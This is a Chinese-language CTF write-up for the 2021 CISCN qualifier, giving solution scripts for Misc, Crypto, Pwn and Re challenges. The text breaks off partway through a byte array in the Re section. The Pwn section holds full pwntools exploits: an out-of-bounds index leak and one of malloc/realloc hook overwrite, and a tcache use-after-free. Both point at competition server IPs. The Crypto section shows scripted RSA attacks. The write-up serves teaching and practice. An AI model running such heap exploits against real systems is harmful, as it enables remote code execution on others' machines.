2021-CISCN-First-Other

2021-CISCN-First-Other

五月 16, 2021

Misc

tiny traffic

拿到流量包审计流量发现两个可疑文件testsecret,查看服务器响应信息得知其使用br算法压缩,写个脚本解压缩

1
2
3
4
5
6
import brotli

with open('secret','rb') as f:
content = brotli.compress(f.read())
with open('secret123','wb') as o:
o.write(content)

test解压缩后得到proto3协议自定义规则。
python写个脚本用该规则读取secret中解压缩的数据得到flag,转一下格式即可

1
2
3
4
5
6
7
8
9
10
11
import flag_pb2 as flag

def read_test():
flag_msg = flag.PBResponse()
flag_msg_file = "./secret123"

f = open(flag_msg_file, "rb")
flag_msg.ParseFromString(f.read())
f.close()

print(flag_msg)

running_pixel

gif文件分割后查看图片像素可以在RGB的低3位色道中看到一个突兀的小点,提取像素发现该值为(233,233,233),且很多图片都有。
很明显该像素点的运动轨迹即为flag。运动轨迹提取脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import os
from PIL import Image

files = os.listdir('./running_pixel.gif.ifl')

img = Image.new('RGB',(400,400),0)

num = 0
for file in files:
tmp = Image.open('./running_pixel.gif.ifl/'+file)
flag = 0 ; tmp_num = 0
for i in range(400):
for j in range(400):
pixel = tmp.getpixel((j,i))
tmp_num += 1
if pixel == (233,233,233):
img.putpixel((i,j),(255,255,255))
flag = 1
tmp_num = 0
break
if flag == 1:
break
if tmp_num == 160000:
num += 1
img.save('flag'+str(num).zfill(2)+'.png')
for i in range(400):
for j in range(400):
img.putpixel((i,j),0)

隔空喊话

题目所给数据为PDU编码数据,工具解码即可看到关键提示。

查阅PDU编码格式资料发现第五行之后的数据时间顺序紊乱,脚本排序后再次解码可以得到宽高错误的png文件,提示w465,将宽度修改为465,高任意,然后打开即可看到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# 时间戳排序脚本
import binascii
with open('data.txt','r') as f:
with open('data123.txt','w') as o:
tmp = []
for line in f.readlines():
#36
tmp.append(line.strip())

for i in range(len(tmp)-1):
for j in range(len(tmp)-1):
tmp_data_1 = tmp[j]
tmp_data_2 = tmp[j+1]
tmp_data_1 = tmp_data_1[42:44][::-1]+tmp_data_1[44:46][::-1]
tmp_data_2 = tmp_data_2[42:44][::-1]+tmp_data_2[44:46][::-1]
if int(tmp_data_1[:2]) * 60 + int(tmp_data_1[2:]) > int(tmp_data_2[:2]) * 60 + int(tmp_data_2[2:]):
tmp_data = tmp[j+1]
tmp[j+1] = tmp[j]
tmp[j] = tmp_data

for i in tmp:
o.write(i+'\n')
1
2
3
4
5
6
# 解码后hex数据转文件
import binascii
with open('data.back.txt','r') as f:
with open('data_hex','wb') as o:
for line in f.readlines():
o.write(binascii.a2b_hex(line.strip()))

robot

查看流量包可以发现流量包中存在明文坐标数据。脚本提取坐标画图直接出。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
with open('cap.pcapng','rb') as f:
with open('data.txt','wb') as o:
f.read(0x120)
tmp = f.read(0x1c)
while tmp != b'':
length = 0
for i in f.read(4)[::-1]:
length = length * 256 + i

if length >= 135 and length <= 140:
if length % 4 != 0:
length += 4 - length % 4
o.write(bytes.fromhex(hex(length)[2:]))
o.write(f.read(length))
else:
if length % 4 != 0:
length += 4 - length % 4
f.read(length)
tmp = f.read(0x1c)


with open('data.txt','rb') as f:
with open('address.txt','w') as o:
length = f.read(1)
while length != b'':
data = f.read(length[0])

l_index = data.index(b'Value\x00[')
l_index = data.index(b'[',l_index)
r_index = data.index(b']',l_index)
data = data[l_index:r_index+1]
data = data.decode()+'\n'
if '-' not in data:
o.write(data)
length = f.read(1)

from PIL import Image

img = Image.new('L',(400,200))
with open('address.txt','r') as f:
for line in f.readlines():
line = eval(line.strip())
img.putpixel((line[0],line[1]),255)

img.show()

Crypto

Move

和2021虎符的题挺像。
先造格子LLL,规约出x和y;再用二分法算出p+q;再解方程求出p和q;剩下就是ECC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
n = 80263253261445006152401958351371889864136455346002795891511487600252909606767728751977033280031100015044527491214958035106007038983560835618126173948587479951247946411421106848023637323702085026892674032294882180449860010755423988302942811352582243198025232225481839705626921264432951916313817802968185697281
e = 67595664083683668964629173652731210158790440033379175857028564313854014366016864587830963691802591775486321717360190604997584315420339351524880699113147436604350832401671422613906522464334532396034178284918058690365507263856479304019153987101884697932619200538492228093521576834081916538860988787322736613809
h1 = 3518005
h2 = 641975
c = (6785035174838834841914183175930647480879288136014127270387869708755060512201304812721289604897359441373759673837533885681257952731178067761309151636485456082277426056629351492198510336245951408977207910307892423796711701271285060489337800033465030600312615976587155922834617686938658973507383512257481837605,38233052047321946362283579951524857528047793820071079629483638995357740390030253046483152584725740787856777849310333417930989050087087487329435299064039690255526263003473139694460808679743076963542716855777569123353687450350073011620347635639646034793626760244748027610309830233139635078417444771674354527028)

hn = int(sqrt(n))
M = matrix([[hn, e],
[0, -n]])
L = M.LLL()[0]
# print (L)
# (-235436912945336662391026124471105219395770217328162018931594609419582745114251948238840212881814533708592325776478635076056630520429862826686225762483017735282225173655229129488512828712599656980161312082481987496707036067942329100, -406850608655407486298019095013146348847805975120061760929682791882948049742096195978800022454159691659865169100330308708576847735609146508679126419372034710027124703842712262177437006326228856546452636094881051757653949488135598409)
mm = matrix(L)
# print ((-mm)/M)
x, y = 26279444166664821795077701675621823220865336004430428203703688888211697122228, 22131877391133483964429946329193825460775374851078084751208971056041193500203
bound = int(sqrt(2 * n)) // 12

def find_p_puls_q(K, N):
l = 0
r = K
for i in range(515):
s = (l + r) // 2
v = s * s - int(9 * s ^ 2 * (K - 1 - s) * (K - 1 - s)) // (round(N ^ 0.25) * round(N ^ 0.25))
if v < 4 * N:
l = s
else:
r = s
return r

k = e * x - y * n
K = k // y
s = find_p_puls_q(K, n)
# print(s)
# s=18383013852155207284866834850624501649134164688503883162216824258842790032992437383933186349369945088653252318167911285710266631681220716855493349532603970
var('p q')
eq1 = p + q == s
eq2 = p * q == n
solve([eq1, eq2], p, q)
p = 7137110102022535123348664656689848983548191256934755709215236325084864398993149288243244941561397379979025441681860286823605147363784020425000696750337273
q = 11245903750132672161518170193934652665585973431569127453001587933757925633999288095689941407808547708674226876486050998886661484317436696430492652782266697
a = 0
x, y = 6785035174838834841914183175930647480879288136014127270387869708755060512201304812721289604897359441373759673837533885681257952731178067761309151636485456082277426056629351492198510336245951408977207910307892423796711701271285060489337800033465030600312615976587155922834617686938658973507383512257481837605, 38233052047321946362283579951524857528047793820071079629483638995357740390030253046483152584725740787856777849310333417930989050087087487329435299064039690255526263003473139694460808679743076963542716855777569123353687450350073011620347635639646034793626760244748027610309830233139635078417444771674354527028
# y^2==(x^3+b)%n
b = (y ^ 2 - x ^ 3) % n
# b=80263253261445006152401958351371889864136455346002795891511487600252909606767728751977033280031100015044527491214958035106007038983560835618126173948587479951247946411421103469394495274706241578726021598690355239783781433785479293793926265140251884444575671410967573946453503486277025286699273827984004452338
phi = (p + 1) * (q + 1)
d = inverse_mod(e, phi)
E = EllipticCurve(GF(p), [a, b])
C = E([x, y])
G = d * C
print(G)

from Crypto.Util.number import *
print(long_to_bytes(1500537458076802315061673741609048809282155574)+long_to_bytes(293348288331056197202496342835702240774641366909))

Imageencrypt

用testimage爆破key,排列组合试一下推出ch,然后求seq,再求x,求r,再求x0

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
# -*- coding: utf-8 -*-
from collections import Counter
import itertools
import md5

testimage=[205, 237, 6, 158, 24, 119, 213, 32, 74, 151, 142, 186, 57, 28, 113, 62, 165, 20, 190, 37, 159, 137, 196, 44, 97, 37, 7, 222, 220, 95, 4, 66, 0, 28, 199, 142, 95, 105, 119, 232, 250, 215, 60, 162, 91, 211, 63, 30, 91, 108, 217, 206, 80, 193, 230, 42, 221, 71, 136, 115, 22, 176, 91, 57, 61, 3, 87, 73, 250, 121, 51, 72, 83, 120, 77, 199, 236, 190, 249, 116, 45, 6, 134, 110, 149, 94, 214, 232, 153, 213, 119, 98, 81, 203, 240, 114, 240, 29, 122, 188, 156, 53, 128, 185, 40, 147, 245, 204, 47, 101, 80, 229, 41, 150, 28, 195, 25, 235, 119, 6, 192, 8, 73, 255, 159, 172, 77, 94, 254, 104, 236, 219, 141, 91, 195, 162, 97, 56, 252, 173, 163, 43, 167, 214, 50, 73, 115, 190, 254, 53, 61, 77, 138, 192, 15, 4, 190, 27, 37, 108, 101, 135, 90, 215, 106, 243, 112, 111, 106, 89, 143, 150, 185, 142, 192, 176, 48, 138, 164, 185, 61, 77, 72, 0, 17, 203, 210, 71, 186, 49, 162, 250, 218, 219, 195, 63, 248, 220, 155, 180, 219, 132, 219, 94, 144, 247, 211, 95, 70, 227, 222, 31, 69, 24, 13, 216, 185, 108, 137, 57, 186, 211, 55, 27, 158, 241, 223, 21, 134, 106, 152, 127, 187, 245, 246, 131, 176, 177, 228, 100, 112, 11, 84, 61, 193, 42, 41, 69, 229, 145, 254, 138, 3, 153, 123, 31]
enc_testimag=[131, 92, 72, 47, 177, 57, 131, 118, 4, 38, 192, 19, 119, 82, 63, 143, 235, 165, 15, 140, 209, 223, 117, 133, 47, 148, 81, 144, 138, 246, 173, 235, 177, 181, 110, 39, 9, 192, 57, 166, 180, 153, 141, 19, 234, 157, 142, 80, 234, 197, 151, 152, 249, 143, 176, 155, 147, 17, 57, 194, 191, 254, 13, 144, 140, 85, 25, 248, 172, 208, 154, 249, 5, 201, 27, 137, 69, 23, 175, 34, 156, 72, 208, 32, 195, 16, 127, 65, 207, 131, 57, 203, 7, 98, 89, 36, 65, 75, 211, 21, 45, 132, 214, 239, 102, 58, 68, 130, 97, 204, 225, 76, 152, 216, 74, 149, 79, 165, 198, 72, 150, 94, 7, 177, 46, 226, 252, 247, 79, 62, 69, 106, 60, 21, 106, 236, 47, 145, 170, 28, 18, 101, 14, 152, 131, 7, 37, 15, 168, 99, 115, 27, 220, 150, 89, 82, 232, 170, 107, 221, 212, 46, 235, 129, 36, 66, 217, 222, 36, 15, 217, 192, 247, 192, 113, 230, 129, 196, 13, 247, 148, 228, 225, 86, 71, 133, 132, 238, 236, 127, 11, 83, 107, 141, 114, 150, 182, 146, 213, 250, 141, 53, 114, 16, 198, 70, 133, 17, 247, 173, 136, 73, 236, 78, 188, 150, 239, 58, 199, 136, 11, 122, 134, 77, 47, 167, 137, 188, 55, 195, 41, 49, 245, 92, 160, 213, 254, 0, 85, 205, 193, 69, 2, 140, 143, 155, 127, 236, 179, 199, 168, 35, 85, 40, 45, 174]
enc_flagimag=[198, 143, 247, 3, 152, 139, 131, 84, 181, 180, 252, 177, 192, 25, 217, 179, 136, 107, 190, 62, 4, 6, 90, 53, 105, 238, 117, 44, 5, 116, 132, 195, 214, 171, 113, 209, 18, 31, 194, 174, 228, 212, 196, 14, 27, 41, 211, 56, 139, 135, 225, 214, 89, 122, 178, 212, 185, 231, 204, 150, 204, 212, 160, 142, 213, 173, 186, 166, 65, 238, 5, 32, 45, 31, 25, 189, 148, 38, 78, 79, 33, 56, 227, 48, 103, 163, 31, 189, 37, 124, 106, 249, 86, 188, 86, 233, 41, 250, 89, 7, 212, 234, 111, 104, 245, 102, 227, 96, 160, 67, 181, 13, 26, 192, 214, 210, 188, 84, 216, 215, 243, 72, 233, 2, 122, 166, 107, 251, 70, 128, 94, 190, 185, 210, 34, 85, 77, 29, 182, 77, 115, 208, 228, 252, 73, 198, 151, 70, 10, 97, 138, 235, 21, 117, 239, 102, 129, 2, 253, 80, 53, 61, 184, 220, 41, 82, 37, 140, 23, 143, 179, 53, 153, 113, 213, 211, 111, 197, 248, 65, 60, 69, 1, 81, 48, 254, 251, 89, 195, 8, 93, 190, 66, 174, 97, 175, 210, 191, 66, 112, 123, 128, 33, 230, 237, 104, 16, 192, 239, 173, 44, 10, 120, 231, 114, 151, 140, 63, 103, 44, 243, 222, 242, 73, 51, 46, 98, 137, 163, 152, 147, 95, 223, 3, 15, 112, 85, 215, 133, 131, 240, 239, 224, 195, 140, 124, 70, 156, 221, 241, 37, 245, 1, 99, 9, 157, 99, 150, 47, 118, 225, 16, 13, 141, 135, 99, 18, 119, 63, 160, 6, 247, 27, 68, 45, 199, 86, 193, 252, 21, 135, 32, 42, 103, 114, 241, 49, 249, 182, 52, 18, 155, 157, 61, 4, 246, 158, 52, 118, 242, 195, 54, 139, 232, 100, 31, 11, 233, 58, 100, 101, 137, 83, 145, 209, 7, 241, 96, 57, 148, 207, 29, 237, 124, 177, 166, 161, 20, 116, 122, 61, 71, 46, 82, 18, 157, 253, 130, 112, 66, 94, 57, 221, 243, 222, 192, 147, 5, 130, 201, 174, 26, 160, 16, 188, 103, 187, 11, 238, 182, 144, 4, 137, 33, 84, 100, 7, 239, 219, 83, 112, 189, 166, 58, 93, 141, 30, 198, 220, 196, 118, 172, 5, 45]

def generate(x, r):
return round(r * x * (3 - x), 6)

keys = []
for i in range(256):
keys.append(testimage[i] ^ enc_testimag[i])
c = Counter(keys)
#print(c.most_common(4))
for key1, key2 in itertools.product([86, 169], [78, 177]):
chs = []
for i in range(256):
ch = -1
if enc_testimag[i]^testimage[i] == key1:
ch = 0
if enc_testimag[i]^testimage[i] == (~key1)&0xff:
ch = 1
if enc_testimag[i]^testimage[i] == key2:
ch = 2
if enc_testimag[i]^testimage[i] == (~key2)&0xff:
ch = 3
chs.append(ch)
binch = ''.join([bin(ch)[2:].rjust(2, '0') for ch in chs])
seqs = [int(binch[i:i + 16], 2) for i in range(0, len(binch), 16)]
rs = []
for i in range(1, len(seqs)):
x2 = seqs[i] / 22000
x1 = seqs[i - 1] / 22000
try:
r = x2 / (x1 * (3 - x1))
except:
pass
rs.append(r)

key1 = 169
key2 = 78
r = 1.2
seqs = [47909, 47275, 48284, 46656, 49226, 45038, 51495, 40740, 56131, 30213, 58976, 22593, 53493, 36492, 58734, 23276,
54242, 34786, 59225, 21883, 52659, 38317, 57857, 25696, 56490, 29302, 58654, 23501, 54478, 34236, 59316, 21623]
tmp = [round(seq / 22000, 6) for seq in seqs]

v = round(tmp[0], 6)
for i in range(1000):
tmpv = v - 1000 * 0.000001 + i * 0.000001
f = True
for j in range(0, len(seqs)):
if int(seqs[j] != int(tmpv * 22000)):
f = False
tmpv = generate(tmpv, r)
if f:
print (v - 1000 * 0.000001 + i * 0.000001)

x = 2.177698
x0 = 0.840264
for i in range(len(seqs) - 1):
x = generate(x, r)
for i in range(16):
x = generate(x, r)
seqs.append(int(x * 22000))
bins = ''
for seq in seqs:
binx = bin(seq)[2:]
if len(binx) < 16:
binx = '0' * (16 - len(binx)) + binx
bins += binx
plain = []
for i in range(24):
for j in range(16):
index = 16 * i + j
ch = int(bins[2 * index:2 * index + 2], 2)
pix = enc_flagimag[index]
if ch == 0:
pix =( pix^key1)&0xff
if ch == 1:
pix = (~pix^key1)&0xff
if ch == 2:
pix = (pix^key2)&0xff
if ch == 3:
pix = (~pix^key2)&0xff
plain.append(pix)

data = ''.join(map(chr, plain))
print md5.new(data).hexdigest()

Rsa

msg1:e=3,RSA的低加密指数攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
import gmpy2
from Crypto.Util.number import *
c = 19105765285510667553313898813498220212421177527647187802549913914263968945493144633390670605116251064550364704789358830072133349108808799075021540479815182657667763617178044110939458834654922540704196330451979349353031578518479199454480458137984734402248011464467312753683234543319955893
e = 3
n = 123814470394550598363280518848914546938137731026777975885846733672494493975703069760053867471836249473290828799962586855892685902902050630018312939010564945676699712246249820341712155938398068732866646422826619477180434858148938235662092482058999079105450136181685141895955574548671667320167741641072330259009L
i=0
while 1:
if(gmpy2.iroot(c+i*n, 3)[1]==1):
res = gmpy2.iroot(c+i*n, 3)
ans = res[0]
break
i=i+1
#print(long_to_bytes(ans))
msg1=long_to_bytes(ans)

msg2:共模攻击
from libnum import n2s,s2n
import gmpy2
def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)
c1=54995751387258798791895413216172284653407054079765769704170763023830130981480272943338445245689293729308200574217959018462512790523622252479258419498858307898118907076773470253533344877959508766285730509067829684427375759345623701605997067135659404296663877453758701010726561824951602615501078818914410959610
n=111381961169589927896512557754289420474877632607334685306667977794938824018345795836303161492076539375959731633270626091498843936401996648820451019811592594528673182109109991384472979198906744569181673282663323892346854520052840694924830064546269187849702880332522636682366270177489467478933966884097824069977L
e1=17
c2=91290935267458356541959327381220067466104890455391103989639822855753797805354139741959957951983943146108552762756444475545250343766798220348240377590112854890482375744876016191773471853704014735936608436210153669829454288199838827646402742554134017280213707222338496271289894681312606239512924842845268366950
e2=65537
s = egcd(e1, e2)
s1 = s[1]
s2 = s[2]
if s1<0:
s1 = - s1
c1 = gmpy2.invert(c1, n)
elif s2<0:
s2 = - s2
c2 = gmpy2.invert(c2, n)
m = pow(c1,s1,n)*pow(c2,s2,n) % n
#print n2s(m)
msg2 = long_to_bytes(m)

msg3高位攻击恢复p
from Crypto.Util.number import *
import gmpy2
c3 = 59213696442373765895948702611659756779813897653022080905635545636905434038306468935283962686059037461940227618715695875589055593696352594630107082714757036815875497138523738695066811985036315624927897081153190329636864005133757096991035607918106529151451834369442313673849563635248465014289409374291381429646
e3 = 65537
n3 =
113432930155033263769270712825121761080813952100666693606866355917116416984149165507231925180593860836255402950358327422447359200689537217528547623691586008952619063846801829802637448874451228957635707553980210685985215887107300416969549087293746310593988908287181025770739538992559714587375763131132963783147L

#sage求p

p3 = 11437038763581010263116493983733546014403343859218003707512796706928880848035239990740428334091106443982769386517753703890002478698418549777553268906496423
m3 = 978430871477569051989776547659020359721056838635797362474311886436116962354292851181720060000979143571198378856012391742078510586927376783797757539078239088349758644144812898155106623543650953940606543822567423130350207207895380499638001151443841997176299548692737056724423631882

q3 = n3 / p3
phi3 = (p3-1) * (q3-1)
d = gmpy2.invert(e3,phi3)
msg3 = pow(c3,d,n3)
#print(long_to_bytes(msg3))
msg3=long_to_bytes(m3)

import md5
text =msg1+msg2+msg3
print text
print md5.new(text).hexdigest()

Pwn

pwny

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from pwn import*
import sys
context.arch = 'amd64'
libc = ELF('./libc-2.27.so')
elf = ELF('./pwny')
r = remote('124.70.2.166', 23040)

def all_in(idx, cont='', flag=0):
r.sendlineafter('choice: ', '2')
r.sendlineafter('Index: ', str(idx))
if flag == 1:
r.send(str(cont))

def read(flag=0, idx=0):
if flag == 1:
r.sendlineafter('choice: ', '1')
r.sendlineafter('Index: ', p64(idx))
else:
r.sendlineafter('Index: ', str(3))
info("FD is not 0!!!")

def pwn():
all_in(256)
# gdb.attach(r)
# gdb.attach(r, 'set *0x555555756860=0')
read(1, 0xfffffffffffffff0)
r.recvuntil('Result: ')
libc_addr = int(r.recvuntil('\n', drop=1), 16) - libc.sym['__libc_start_main']
if libc_addr < 0:
r.close()
malloc_hook = libc_addr + libc.sym['__malloc_hook']
onegadget = [0x4f3d5, 0x4f432,0x10a41c]#
onegadget = libc_addr + onegad[1]
realloc = libc_addr + libc.sym['realloc']
realloc_hook = libc_addr + libc.sym['__realloc_hook']
read(1, 0xfffffffffffffff5)
r.recvuntil('Result: ')
text_addr = int(r.recvuntil('\n', drop=1), 16) - 0x202008
array_addr = text_addr + 0x202060
success("text_addr: 0x%x"%(text_addr))
off = (realloc_hook - array_addr)/8
all_in(off, p64(onegadget), 1)

off = (malloc_hook - array_addr)/8
all_in(off , p64(realloc+2), 1)

r.sendline('1'*0x500)

if __name__ == '__main__':
while 1:
try:
r = remote('123.60.211.115', 23074)
pwn()
r.interactive()
except:
r.close()

lonelywolf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
from pwn import*
import sys
context.arch = 'amd64'
def add(size):
r.sendlineafter('choice: ','1')
r.sendlineafter('Index: ', '0')
r.sendlineafter('Size: ',str(size))

def edit(cont):
r.sendlineafter('choice: ','2')
r.sendlineafter('Index: ', '0')
r.sendlineafter('Content: ',str(cont))

def delete():
r.sendlineafter('choice: ', '4')
r.sendlineafter('Index: ', '0')

def show():
r.sendlineafter('choice: ', '3')
r.sendlineafter('Index: ', '0')

def confirm(name,addr):
log.success('The '+str(name)+' Addr=====> ' + str(hex(addr)))


main_arena = 0x3ebc40
elf=ELF('./lonelywolf')
libc=ELF('./libc-2.27.so')


def pwn():
#UAF
add(8)
delete()
edit('A'*7 + 'B')
show()
r.recvuntil('B')
heap_base = u64(r.recvuntil('\n', drop=1, timeout=1).ljust(8, '\x00')) - 0x10
key = heap_base + 0x10
edit(p64(0))
add(0x10)
delete()
edit(p64(heap_base+0x10) + p64(key))
add(0x10)
add(2)
edit(p8(0)+p8(0x7))
add(0x20)
delete()
add(0x30)
r.sendline('1'*0x500)
add(0x20)
show()
r.recvuntil('Content: ')
libc_addr = u64(r.recvuntil('\n', drop=1).ljust(8, '\x00')) - 0x80 -main_arena
malloc_hook = libc_addr + libc.sym['__malloc_hook']
realloc_hook = libc_addr + libc.sym['__realloc_hook']
realloc = libc_addr + libc.sym['realloc']
onegad = [0x4f3d5, 0x4f432,0x10a41c]
onegadget = libc_addr + onegad[2]
confirm('malloc_hook', malloc_hook)
confirm('onegadget', onegadget)
add(0x30)
delete()
edit(p64(malloc_hook)+ p64(key))
add(0x30)
add(0x30)
edit(p64(onegadget))
add(0x30)


if __name__ == '__main__':
r = remote('123.60.211.115',22997)
pwn()
r.interactive()

Re

glass

简单安卓native层逆向,解包后找到so文件直接ida加载就能看见checkflag函数,逻辑简单,三个小加密函数,对着写解密脚本就行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
flag = [
0xA3, 0x1A, 0xE3, 0x69, 0x2F, 0xBB, 0x1A, 0x84, 0x65, 0xC2,
0xAD, 0xAD, 0x9E, 0x96, 0x05, 0x02, 0x1F, 0x8E, 0x36, 0x4F,
0xE1, 0xEB, 0xAF, 0xF0, 0xEA, 0xC4, 0xA8, 0x2D, 0x42, 0xC7,
0x6E, 0x3F, 0xB0, 0xD3, 0xCC, 0x78, 0xF9, 0x98, 0x3F
]
password = '12345678'

tmp_1 = [i for i in range(256)]
tmp_2 = [password[i%8] for i in range(256)]

v9 = 0
for i in range(256):
v10 = tmp_1[i]
v9 = (v9 + v10 + ord(tmp_2[i])) % 256
tmp_1[i] = tmp_1[v9]
tmp_1[v9] = v10

for i in range(39):
flag[i] ^= ord(password[i%8])

for i in range(38,0,-3):
flag[i-1] ^= flag[i-2]
flag[i] ^= flag[i-1]
flag[i-2] ^= flag[i]

v3 = 0
for i in range(38):
v5 = tmp_1[i+1]
v3 = (v3+v5)%256
tmp_1[i+1] = tmp_1[v3]
tmp_1[v3] = v5
flag[i] ^= tmp_1[(v5+tmp_1[i+1])%256]

print(''.join([chr(i) for i in flag]))

ciscn_gift

go语音逆向,去除了符号表,这里比赛中未能做出(因为菜鸡最后也没学会怎么手动恢复go语言编译器生成的无符号表exe,这里出题人处理掉了.gopclntab

赛后才知道IDA7.6加载的话可以直接自动恢复。应该是利用.STRTAB和另一个记载了函数起始地址的表直接恢复(关于这个恢复原理是本人猜测,还未尝试验证)

官网下载IDA7.6-free版,然后直接分析程序。

在主函数main_main里看到输出flag的代码逻辑,逐字节输出,预设了一个密文表,属于查表计算,主要在于计算每一字节对应的index

main_wtf是一个递归函数,index的关键计算公式经优化结果为:x=x-17*(x>>4)+1,其递归次数的规律符合如下函数:

f(n)的输出是有循环规律的,这里直接给出:

将出题人给出的递归深度数据直接模八取余对应查表即可得到flag,脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
ida_chars =[
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0B, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x0E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x0F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x17, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1A, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1B, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x1C, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x1D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x1E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1F, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x22, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x23, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x25, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x26, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x27, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x28, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x29, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x2B, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x2C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x2D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2E, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2F, 0x00, 0x00, 0x00,
